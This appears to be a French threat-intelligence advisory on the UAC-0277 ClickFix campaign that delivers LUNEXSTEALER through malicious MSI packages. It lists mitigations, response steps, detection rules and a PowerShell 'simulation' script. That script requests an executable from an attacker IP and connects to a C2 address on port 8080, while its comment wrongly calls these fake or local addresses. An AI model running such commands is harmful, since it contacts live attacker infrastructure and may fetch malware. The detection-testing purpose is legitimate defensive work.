SOC Prime Bias: High

06 Oct 2026 14:30 UTC

Les attaques UAC-0277 livrent LUNEXSTEALER via MSI malveillant et ClickFix

Author Photo
SOC Prime Team linkedin icon Suivre
Les attaques UAC-0277 livrent LUNEXSTEALER via MSI malveillant et ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs de menace suivis sous le nom UAC-0277 compromettent des sites Web légitimes pour injecter du JavaScript malveillant qui incite les utilisateurs à exécuter des commandes via une fausse page de vérification Cloudflare. Cette technique ClickFix livre finalement des paquets MSI contenant LUNEXSTEALER ou des chargeurs supplémentaires qui exploitent BYOVD pour contourner les contrôles de sécurité. La campagne utilise également une infrastructure de commande et de contrôle basée sur la blockchain sur Polygon et Ethereum pour gérer dynamiquement les ressources des attaquants.

Enquête

Le CERT-UA a identifié plus de 100 sites Web compromis et analysé trois variantes de MSI associées à la campagne. Les chercheurs ont observé un chargement de DLL par substitution impliquant FnHotkeyUtility.exe et l’exploitation du pilote vulnérable AMD PDFWKRNL.sys pour contourner les protections de Windows Defender. L’enquête a également révélé l’extension de navigateur LUNARAXE et le composant PowerShell NAIVEMESS utilisés pour collecter et exfiltrer des données.

Atténuation

Les administrateurs doivent restreindre l’accès à la boîte de dialogue Exécuter (Win+R) via la stratégie de groupe et limiter les privilèges d’installation MSI aux utilisateurs autorisés. Activer la liste de blocage des pilotes vulnérables de Microsoft est essentiel pour réduire le risque d’attaques BYOVD. Les organisations doivent également appliquer des listes d’autorisations pour les extensions de navigateur et surveiller toute activité suspecte de ligne de commande msiexec.exe impliquant des URL distantes.

Réponse

Lorsqu’une exécution MSI suspecte ou des extensions de navigateur non autorisées sont détectées, isolez l’hôte affecté et terminez les processus associés à LUNEXSTEALER. Vérifiez les tâches planifiées pour les entrées nommées psychedelicloveUtils et inspectez les profils des navigateurs pour l’extension Microsoft Office Word Editor. Toute page de vérification Cloudflare frauduleuse identifiée associée à la campagne doit être signalée au CERT-UA.

Flux d’attaque

Détections

Entrée RunMRU suspecte avec sémantique LOLBin (via registry_event)

Équipe SOC Prime
05 oct. 2026

Tentative possible d’installation de fichier MSI distant (via cmdline)

Équipe SOC Prime
05 oct. 2026

Tâche planifiée suspecte (via audit)

Équipe SOC Prime
05 oct. 2026

Téléchargement de fichier direct IP suspect (via proxy)

Équipe SOC Prime
05 oct. 2026

Commande et contrôle suspects par demande DNS de domaine de niveau supérieur inhabituel (via dns)

Équipe SOC Prime
05 oct. 2026

IOCs (HashSha256) pour détecter : Campagne UAC-0277 : Déploiement MSI malveillant via la technique ClickFix et malware LUNEXSTEALER Partie 2

Règles SOC Prime AI
06 oct. 2026

IOCs (HashSha256) pour détecter : Campagne UAC-0277 : Déploiement MSI malveillant via la technique ClickFix et malware LUNEXSTEALER Partie 1

Règles SOC Prime AI
06 oct. 2026

IOCs (HashMd5) pour détecter : Campagne UAC-0277 : Déploiement MSI malveillant via la technique ClickFix et malware LUNEXSTEALER Partie 2

Règles SOC Prime AI
06 oct. 2026

IOCs (HashMd5) pour détecter : Campagne UAC-0277 : Déploiement MSI malveillant via la technique ClickFix et malware LUNEXSTEALER Partie 1

Règles SOC Prime AI
06 oct. 2026

IOCs (SourceIP) pour détecter : Campagne UAC-0277 : Déploiement MSI malveillant via la technique ClickFix et malware LUNEXSTEALER

Règles SOC Prime AI
06 oct. 2026

IOCs (DestinationIP) pour détecter : Campagne UAC-0277 : Déploiement MSI malveillant via la technique ClickFix et malware LUNEXSTEALER

Règles SOC Prime AI
06 oct. 2026

Détecter l’interaction avec des serveurs C2 malveillants utilisant HTTP et WebSocket [Connexion réseau Windows]

Règles SOC Prime AI
06 oct. 2026

FnHotkeyUtility exécutant spkvol.dll malveillant via le chargement de DLL par substitution [Sysmon Windows]

Règles SOC Prime AI
06 oct. 2026

Téléchargement de paquet MSI malveillant utilisant Msiexec et exploitation de vulnérabilité [Création de processus Windows]

Règles SOC Prime AI
06 oct. 2026

Détecter le JavaScript malveillant sur les sites Web compromis [Serveur web]

Règles SOC Prime AI
06 oct. 2026

Exécution de simulation

  • Narrative d’attaque et commandes : L’adversaire a réussi à réaliser une compromission drive-by. Pour établir la persistance et télécharger le malware de l’étape suivante, l’agent implanté tente de récupérer un fichier nommé psychedeliclove.exe à partir d’un URI spécifique. Simultanément, l’agent tente de baliser vers un nœud C2 secondaire situé à 193.178.159.128 sur le port 8080 pour recevoir des instructions via une connexion HTTP de type WebSocket. Ces indicateurs spécifiques visent à déclencher les règles de détection basées sur le proxy existantes.

  • Script de test de régression :

    # Script de simulation pour validation de détection
    # Objectif : Déclencher les indicateurs d'URL et IP/Port spécifiques dans la règle de détection.
    
    Write-Host "[*] Démarrage de la simulation..." -ForegroundColor Cyan
    
    # 1. Déclencheur Sélection 1 : Modèle d'URL malveillant
    Write-Host "[*] Tentative d'accès au modèle d'URL malveillant..." -ForegroundColor Yellow
    try {
        # Nous utilisons un écouteur local inexistant ou une fausse URL pour s'assurer que nous ne touchons pas réellement un site malveillant réel,
        # mais le proxy doit toujours enregistrer la tentative de requête.
        Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue
    } catch {
        Write-Host "[!] La requête a échoué (prévu), mais la télémétrie devrait être générée." -ForegroundColor Gray
    }
    
    # 2. Déclencheur Sélection 2 : IP et Port spécifiques
    Write-Host "[*] Tentative de connexion à l'IP C2 sur le port 8080..." -ForegroundColor Yellow
    try {
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect("193.178.159.128", 8080)
        $client.Close()
    } catch {
        Write-Host "[!] La connexion a échoué (prévu), mais les journaux proxy doivent capturer la tentative." -ForegroundColor Gray
    }
    
    Write-Host "[*] Simulation terminée." -ForegroundColor Cyan
  • Commandes de nettoyage :

    # Aucuns fichiers persistants ne sont créés par cette simulation.
    # Seuls des connectivités réseau temporaires sont tentées.
    Write-Host "[*] Nettoyage terminé. Aucun artefact laissé sur le système." -ForegroundColor Green